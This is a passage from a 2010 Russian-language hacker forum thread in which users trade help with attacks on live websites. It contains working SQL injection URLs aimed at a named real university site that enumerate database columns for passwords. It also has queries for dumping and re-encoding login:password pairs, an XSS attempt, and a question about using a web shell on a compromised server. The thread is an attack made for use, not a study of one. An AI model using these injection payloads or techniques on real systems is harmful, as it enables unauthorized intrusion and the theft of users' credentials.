Старый 11.07.2010, 13:19   #31
wildshaman
 
Аватар для wildshaman
 
Регистрация: 05.07.2010
Сообщений: 29
Репутация: 10
По умолчанию

Имеется потенциальная XSS в скрипте
echo $_GET['text'];

Но пeред выводом стоит
@header( "Content-type: text/css; charset=utf-8" );

И xss не сабатывает Что делать?
__________________
Cool story, bro

http://imgur.com/7I5sJ.jpg
wildshaman вне форума   Ответить с цитированием
Старый 11.07.2010, 15:35   #32
mailbrush
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 4
По умолчанию

Ничего, HTML-тэги не будут интерпретироваться браузером, если content type != text/html
mailbrush вне форума   Ответить с цитированием
Старый 11.07.2010, 16:02   #33
shuba
 
Аватар для shuba
 
Регистрация: 05.07.2010
Сообщений: 104
Репутация: 5
По умолчанию

http://www.brockport.edu/athletics/swimming/index.php?id=--962%27+union+select+1,2,3,GROUP_CONCAT%28concat_ws %280x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C6 2723E%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0+from+information_schema.columns+where+column_nam e+like+0x257061737325+or+column_name+like+0x257025 77256425--+

Не выходит достать имена таблиц, кажетца что просто нет таблиц с таким критерием, помогите.
shuba вне форума   Ответить с цитированием
Старый 11.07.2010, 16:09   #34
mailbrush
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 4
По умолчанию

shuba, именно. Нету колонок с такими критериями.

count(*) выводит ноль:
http://www.***.edu/athletics/swimming/index.php?id=-1'+union+select+1,2,3,count(*),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20+from+information_schema.co lumns+where+column_name+like+0x257061737325+or+col umn_name+like+0x25702577256425%23

Последний раз редактировалось Twost; 14.05.2013 в 12:40..
mailbrush вне форума   Ответить с цитированием
Старый 11.07.2010, 16:18   #35
mailbrush
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 4
По умолчанию

Pashkela, вот именно, если like 'user', то хексить без процента. И вообще, like тогда не не надо, можно просто ...
Код:
where column_name = 'user'
Нам то надо:
Код:
like '%user%'
Цитирую мануал:
Цитата:
Сообщение от http://www.mysql.ru/docs/gruber/mg05.html
* знак процента (%) замещает последовательность любого числа символов
(включая символы нуля). Например '%p%t' будет соответствовать словам
'put', 'posit', или 'opt', но не 'spite'.
mailbrush вне форума   Ответить с цитированием
Старый 11.07.2010, 17:42   #36
shuba
 
Аватар для shuba
 
Регистрация: 05.07.2010
Сообщений: 104
Репутация: 5
По умолчанию

а вот столкнулся с проблемой, при выводе логина и пароля - пароль отображается в непонятной кодировке.

shuba вне форума   Ответить с цитированием
Старый 11.07.2010, 19:03   #37
Chelios
 
Регистрация: 05.07.2010
Сообщений: 42
Репутация: 14
По умолчанию

Цитата:
Сообщение от shuba Посмотреть сообщение
а вот столкнулся с проблемой, при выводе логина и пароля - пароль отображается в непонятной кодировке.

select convert(concat_ws(0x3a,login,password) using binary) from users
select convert(concat_ws(0x3a,login,password) using utf8) from users
select convert(concat_ws(0x3a,login,password) using cp1251) from users
...
Chelios вне форума   Ответить с цитированием
Старый 11.07.2010, 19:12   #38
shuba
 
Аватар для shuba
 
Регистрация: 05.07.2010
Сообщений: 104
Репутация: 5
По умолчанию

Цитата:
Сообщение от Chelios Посмотреть сообщение
select convert(concat_ws(0x3a,login,password) using binary) from users
select convert(concat_ws(0x3a,login,password) using utf8) from users
select convert(concat_ws(0x3a,login,password) using cp1251) from users
...
не помогло

Могу дать линк в личку.
shuba вне форума   Ответить с цитированием
Старый 11.07.2010, 19:42   #39
Dr.TRO
 
Аватар для Dr.TRO
 
Регистрация: 06.07.2010
Сообщений: 90
Репутация: 21
По умолчанию

скорее всего это бинарный набор данных (: в таком же виде и у нас пассы в ирке храняться (: без смысла - забей... ну или гугли биннарный мд5
__________________
http://fc01.deviantart.net/fs48/f/20...eyecixramd.png
http://img156.imageshack.us/img156/2...userbartd7.png
Цитата:
root@rdot.org ~ # perl -MAcme::BadExample
Dr.TRO вне форума   Ответить с цитированием
Старый 11.07.2010, 23:16   #40
Xenu
 
Регистрация: 05.07.2010
Сообщений: 6
Репутация: 0
По умолчанию

Общий вопрос:
Есть доступ по чтению на сервере, к сожалению, не полный
Как узнать настоящий адрес сайта, которому принадлежит та или иная папка? В некоторых случаях адрес сайта совпадает с тем, что указан в configuration.php (joomla) , но это бывает довольно редко.

Чуть конкретнее: есть файл в корне одного из сайтов, который я могу править (-rwxrwxrwx), может быть можно в него засунуть и запустить из веб-шелла какой-нибудь скрипт и пингануть другой сайт, который ведет логи реферреров?
Xenu вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot